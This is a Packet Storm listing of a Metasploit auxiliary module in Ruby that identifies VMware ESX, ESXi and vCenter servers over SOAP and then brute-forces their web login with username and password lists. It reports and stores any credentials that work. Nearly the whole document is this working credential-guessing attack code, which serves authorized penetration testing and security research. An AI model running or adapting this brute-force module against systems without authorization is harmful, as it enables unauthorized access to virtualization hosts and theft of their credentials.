Lucene search

K
packetstormJay Turla, metasploit.comPACKETSTORM:180929
HistoryAug 31, 2024 - 12:00 a.m.

VMWare Web Login Scanner

2024-08-3100:00:00
Jay Turla, metasploit.com
packetstormsecurity.com
34
metasploit
web login
vmware
http service
vmware server
esx
esxi
cve
weak password
ssl
soap
apache tomcat
vmware
inc.

AI Score

7.2

Confidence

Low

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::VIMSoap  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::AuthBrute  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'VMWare Web Login Scanner',  
'Description' => 'This module attempts to authenticate to the VMWare HTTP service  
for VmWare Server, ESX, and ESXI',  
'Author' => ['theLightCosine'],  
'References' =>  
[  
[ 'CVE', '1999-0502'] # Weak password  
],  
'License' => MSF_LICENSE,  
'DefaultOptions' => { 'SSL' => true }  
)  
  
register_options(  
[  
OptString.new('URI', [true, "The default URI to login with", "/sdk"]),  
Opt::RPORT(443)  
])  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: 'vmware',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
last_attempted_at: DateTime.now,  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::SUCCESSFUL,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def run_host(ip)  
return unless is_vmware?  
each_user_pass { |user, pass|  
result = vim_do_login(user, pass)  
case result  
when :success  
print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})"  
report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result)  
return if datastore['STOP_ON_SUCCESS']  
when :fail  
print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})"  
end  
}  
end  
  
# Mostly taken from the Apache Tomcat service validator  
def is_vmware?  
soap_data =  
%Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<env:Body>  
<RetrieveServiceContent xmlns="urn:vim25">  
<_this type="ServiceInstance">ServiceInstance</_this>  
</RetrieveServiceContent>  
</env:Body>  
</env:Envelope>|  
  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['URI']),  
'method' => 'POST',  
'agent' => 'VMware VI Client',  
'data' => soap_data  
}, 25)  
  
unless res  
vprint_error("#{rhost}:#{rport} Error: no response")  
return false  
end  
  
fingerprint_vmware(res)  
rescue ::Rex::ConnectionError => e  
vprint_error("#{rhost}:#{rport} Error: could not connect")  
return false  
rescue => e  
vprint_error("#{rhost}:#{rport} Error: #{e}")  
return false  
end  
  
def fingerprint_vmware(res)  
unless res  
vprint_error("#{rhost}:#{rport} Error: no response")  
return false  
end  
return false unless res.body.include?('<vendor>VMware, Inc.</vendor>')  
  
os_match = res.body.match(/<name>([\w\s]+)<\/name>/)  
ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/)  
build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)  
full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)  
  
if full_match  
print_good "#{rhost}:#{rport} - Identified #{full_match[1]}"  
report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1])  
end  
  
unless os_match and ver_match and build_match  
vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare")  
return false  
end  
  
if os_match[1].include?('ESX') || os_match[1].include?('vCenter')  
# Report a fingerprint match for OS identification  
report_note(  
:host => rhost,  
:ntype => 'fingerprint.match',  
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }  
)  
return true  
end  
end  
end  
`

AI Score

7.2

Confidence

Low